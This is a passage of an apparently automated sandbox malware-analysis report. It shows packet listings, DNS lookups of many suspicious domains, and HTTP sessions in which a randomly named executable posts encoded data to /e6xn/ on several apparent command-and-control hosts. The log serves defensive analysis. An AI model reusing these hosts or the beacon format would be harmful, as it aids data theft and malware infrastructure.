                                                                                  Mar 18, 2024 14:48:36.771383047 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771424055 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.771430016 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771480083 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771526098 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.771531105 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771585941 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771631002 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.880999088 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881026983 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881062984 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881130934 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881129980 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.881170988 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.881304026 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881381035 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881421089 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.881472111 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881532907 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881568909 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.881652117 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881732941 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881777048 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.881795883 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881858110 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881896019 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.881926060 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.881980896 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.882016897 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.882029057 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.882088900 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.882129908 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.882145882 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.934046030 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:37.871753931 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:38.887624979 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:38.999532938 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:38.999689102 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:38.999963045 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.109922886 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.402846098 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.402877092 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.402940989 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.402944088 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.403052092 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403095961 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.403166056 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403325081 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403363943 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.403410912 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403610945 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403656960 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.403687000 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403881073 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.403923035 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.513050079 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513096094 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513135910 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513147116 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.513212919 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513251066 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513257027 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.513355970 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513395071 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513400078 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.513483047 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513520956 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.513585091 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513711929 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513761044 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.513789892 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513911009 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.513962030 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.514112949 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.514168978 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.514209986 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.514276981 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.514399052 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.514436007 CET804975550.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:39.514450073 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:39.559034109 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:40.512408018 CET4975580192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:41.528203964 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:41.637861967 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:41.638036013 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:41.640264988 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:41.749969959 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.117407084 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.117503881 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.117609024 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.117686033 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.117790937 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.117832899 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.117903948 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.118127108 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.118169069 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.118204117 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.118290901 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.118328094 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.118331909 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.118458033 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.118505001 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.227731943 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.227756023 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.227797031 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.227799892 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.227952957 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.227988958 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.228034973 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228075027 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228112936 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.228140116 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228261948 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228312969 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.228348970 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228503942 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228545904 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.228598118 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.228975058 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229012966 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.229094028 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229306936 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229346037 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.229377985 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229415894 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229451895 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.229461908 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229535103 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229547977 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229571104 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.229602098 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.229639053 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.341039896 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.341392994 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.341438055 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.341532946 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.342355013 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.342406034 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.343075991 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.343091011 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.343132019 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.345132113 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345273018 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345319033 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.345459938 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345474958 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345509052 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.345649004 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345791101 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345804930 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345829010 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.345968008 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.345980883 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346004009 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.346152067 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346167088 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346180916 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346188068 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.346220970 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.346415997 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346429110 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346445084 CET804975650.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:42.346466064 CET4975680192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:42.346544027 CET804975650.6.160.34192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 18, 2024 14:46:04.956136942 CET | 192.168.2.10 | 1.1.1.1 | 0xd677 | Standard query (0) | www.cqyh.one | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:05.965495110 CET | 192.168.2.10 | 1.1.1.1 | 0xd677 | Standard query (0) | www.cqyh.one | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:21.872291088 CET | 192.168.2.10 | 1.1.1.1 | 0x53d1 | Standard query (0) | www.d4ffo73dz.sbs | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:37.966083050 CET | 192.168.2.10 | 1.1.1.1 | 0x9dff | Standard query (0) | www.appmystartup.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:52.575689077 CET | 192.168.2.10 | 1.1.1.1 | 0x6e04 | Standard query (0) | www.hondamechanic.today | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:07.560844898 CET | 192.168.2.10 | 1.1.1.1 | 0xdc5d | Standard query (0) | www.oc7o0.top | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:20.856565952 CET | 192.168.2.10 | 1.1.1.1 | 0xbe03 | Standard query (0) | www.mgn.icu | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:35.841558933 CET | 192.168.2.10 | 1.1.1.1 | 0xa2e9 | Standard query (0) | www.nikazo.xyz | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:50.356764078 CET | 192.168.2.10 | 1.1.1.1 | 0x5cc2 | Standard query (0) | www.605alibahis.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:04.388144016 CET | 192.168.2.10 | 1.1.1.1 | 0x9cd0 | Standard query (0) | www.pro-ecoproduct.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:19.778635979 CET | 192.168.2.10 | 1.1.1.1 | 0x2d9c | Standard query (0) | www.supportstuiwords.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:33.388081074 CET | 192.168.2.10 | 1.1.1.1 | 0x2565 | Standard query (0) | www.syscomputerrd.info | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:52.341204882 CET | 192.168.2.10 | 1.1.1.1 | 0x5852 | Standard query (0) | www.agroamsterdam.com | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:00.528634071 CET | 192.168.2.10 | 1.1.1.1 | 0x54eb | Standard query (0) | www.dxgsf.shop | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:14.716094971 CET | 192.168.2.10 | 1.1.1.1 | 0x932f | Standard query (0) | www.le-kuk.shop | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:28.309823990 CET | 192.168.2.10 | 1.1.1.1 | 0xe9d2 | Standard query (0) | www.betful.site | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:36.481654882 CET | 192.168.2.10 | 1.1.1.1 | 0xf20 | Standard query (0) | www.roblesprats.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 18, 2024 14:46:06.098151922 CET | 1.1.1.1 | 192.168.2.10 | 0xd677 | No error (0) | www.cqyh.one | vhs.zhaxiyun.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:46:06.098151922 CET | 1.1.1.1 | 192.168.2.10 | 0xd677 | No error (0) | vhs.zhaxiyun.com |  | 149.88.64.51 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:06.098176003 CET | 1.1.1.1 | 192.168.2.10 | 0xd677 | No error (0) | www.cqyh.one | vhs.zhaxiyun.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:46:06.098176003 CET | 1.1.1.1 | 192.168.2.10 | 0xd677 | No error (0) | vhs.zhaxiyun.com |  | 149.88.64.51 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:22.845184088 CET | 1.1.1.1 | 192.168.2.10 | 0x53d1 | No error (0) | www.d4ffo73dz.sbs | xiaoyue.zhuangkou.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:46:22.845184088 CET | 1.1.1.1 | 192.168.2.10 | 0x53d1 | No error (0) | xiaoyue.zhuangkou.com |  | 47.76.88.64 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:38.365336895 CET | 1.1.1.1 | 192.168.2.10 | 0x9dff | No error (0) | www.appmystartup.com | appmystartup.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:46:38.365336895 CET | 1.1.1.1 | 192.168.2.10 | 0x9dff | No error (0) | appmystartup.com |  | 144.76.75.181 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:46:52.815578938 CET | 1.1.1.1 | 192.168.2.10 | 0x6e04 | No error (0) | www.hondamechanic.today |  | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:07.668138027 CET | 1.1.1.1 | 192.168.2.10 | 0xdc5d | No error (0) | www.oc7o0.top |  | 104.21.63.135 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:07.668138027 CET | 1.1.1.1 | 192.168.2.10 | 0xdc5d | No error (0) | www.oc7o0.top |  | 172.67.145.200 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:21.725610971 CET | 1.1.1.1 | 192.168.2.10 | 0xbe03 | No error (0) | www.mgn.icu |  | 49.0.230.183 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:36.016465902 CET | 1.1.1.1 | 192.168.2.10 | 0xa2e9 | No error (0) | www.nikazo.xyz |  | 66.29.152.141 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:47:50.526184082 CET | 1.1.1.1 | 192.168.2.10 | 0x5cc2 | No error (0) | www.605alibahis.com |  | 192.64.119.184 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:04.784063101 CET | 1.1.1.1 | 192.168.2.10 | 0x9cd0 | No error (0) | www.pro-ecoproduct.com |  | 87.236.19.107 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:20.037801981 CET | 1.1.1.1 | 192.168.2.10 | 0x2d9c | No error (0) | www.supportstuiwords.com |  | 154.7.21.55 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:33.609872103 CET | 1.1.1.1 | 192.168.2.10 | 0x2565 | No error (0) | www.syscomputerrd.info | syscomputerrd.info |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:48:33.609872103 CET | 1.1.1.1 | 192.168.2.10 | 0x2565 | No error (0) | syscomputerrd.info |  | 50.6.160.34 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:48:52.464885950 CET | 1.1.1.1 | 192.168.2.10 | 0x5852 | Name error (3) | www.agroamsterdam.com | none | none | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:00.624356031 CET | 1.1.1.1 | 192.168.2.10 | 0x54eb | No error (0) | www.dxgsf.shop | dxgsf.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 18, 2024 14:49:00.624356031 CET | 1.1.1.1 | 192.168.2.10 | 0x54eb | No error (0) | dxgsf.shop |  | 103.197.25.241 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:14.826455116 CET | 1.1.1.1 | 192.168.2.10 | 0x932f | No error (0) | www.le-kuk.shop |  | 89.31.143.90 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:28.406172037 CET | 1.1.1.1 | 192.168.2.10 | 0xe9d2 | Name error (3) | www.betful.site | none | none | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:49:36.649219036 CET | 1.1.1.1 | 192.168.2.10 | 0xf20 | No error (0) | www.roblesprats.com |  | 208.91.197.132 | A (IP address) | IN (0x0001) | false
                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   0 | 192.168.2.10 | 49715 | 149.88.64.51 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Mar 18, 2024 14:46:06.415072918 CET | 494 | OUT | GET /e6xn/?bvOt=ptLjcD60OGLEAEKwUIEQaugGR9tSXE/bjIUNt3iL6Qw6jfpYmMXFU+LQzVNpETLyO7HgKKKoK0NH56hBGNACCL/xDZHnLmeKZtapvr1OSuWcevHuIw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.cqyh.one
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                   Mar 18, 2024 14:46:06.822541952 CET | 1186 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: kangle/3.5
                                                                                  Date: Mon, 18 Mar 2024 13:46:06 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  X-Cache: MISS from kangle web server
                                                                                  Content-Length: 985
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>404</title></head><body><div id='main' ><i><h2>Something error:</h2></i><p><h3>404</h3><h3><font color='red'>No such file or directory.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: kangle web server</div><hr><div id='pb'>Generated by <a href='javascript: var code=404' >kangle/3.5.21.16</a>.</div></div><script language='javascript'>var referer = escape(document.referrer);var url = escape(document.URL);var msg = 'No%20such%20file%20or%20directory.'; var hostname='kangle web server';var event_id='';var aaaaaaa = ('<scr'+'ipt language="javascript" src="https://error.kangleweb.net/?code=404&vh=vhsa57698"></scr' + 'ipt>');</script>... padding for ie -->... padding for ie -->... padding for ie -->... padding for ie -->... 65f81678 --></body></html>


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   1 | 192.168.2.10 | 49716 | 47.76.88.64 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Mar 18, 2024 14:46:23.153100967 CET | 754 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.d4ffo73dz.sbs
                                                                                  Referer: http://www.d4ffo73dz.sbs/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=PDICHqx/NIPXoZOR8j5W7jXVYt9v1WpI/2MlEseSgKOCjNkYDhbHSXHEEZbrlRwM4ZoHSJi5yb6h9F11Nmm6atK+Aw8jUexlmsnLjrztoMUHGGWCqRYAfrsroGYBCABi05AKaf0sKsO3D3r5Q4AjuwbPN8n48NXRG5f05YczwBt0/LFSu6QSuHiLTLv5
                                                                                   Mar 18, 2024 14:46:23.458705902 CET | 165 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   2 | 192.168.2.10 | 49717 | 47.76.88.64 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Mar 18, 2024 14:46:26.987705946 CET | 778 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.d4ffo73dz.sbs
                                                                                  Referer: http://www.d4ffo73dz.sbs/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=PDICHqx/NIPXr5eR+C5WrzXKdt9v+2pM/2QlEuy8h/mCivsYAgbHbHHEO5bqvxwH4eglSIO5yb+h9B51MXm1b9K8ZA8hKuxlmsnLjrPUoMMHG3mCrwYDcrsotGYBVwAp05AkabV5Ko+3DyH5Rts8lwbJT8m0tOq7DYuL/+0Yuy9q4qkV/rxF9w+FdNaTLp6bU3SAwK4H4KOoRTvCmQ==
                                                                                   Mar 18, 2024 14:46:27.292532921 CET | 165 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   3 | 192.168.2.10 | 49718 | 47.76.88.64 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Mar 18, 2024 14:46:29.813901901 CET | 1791 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
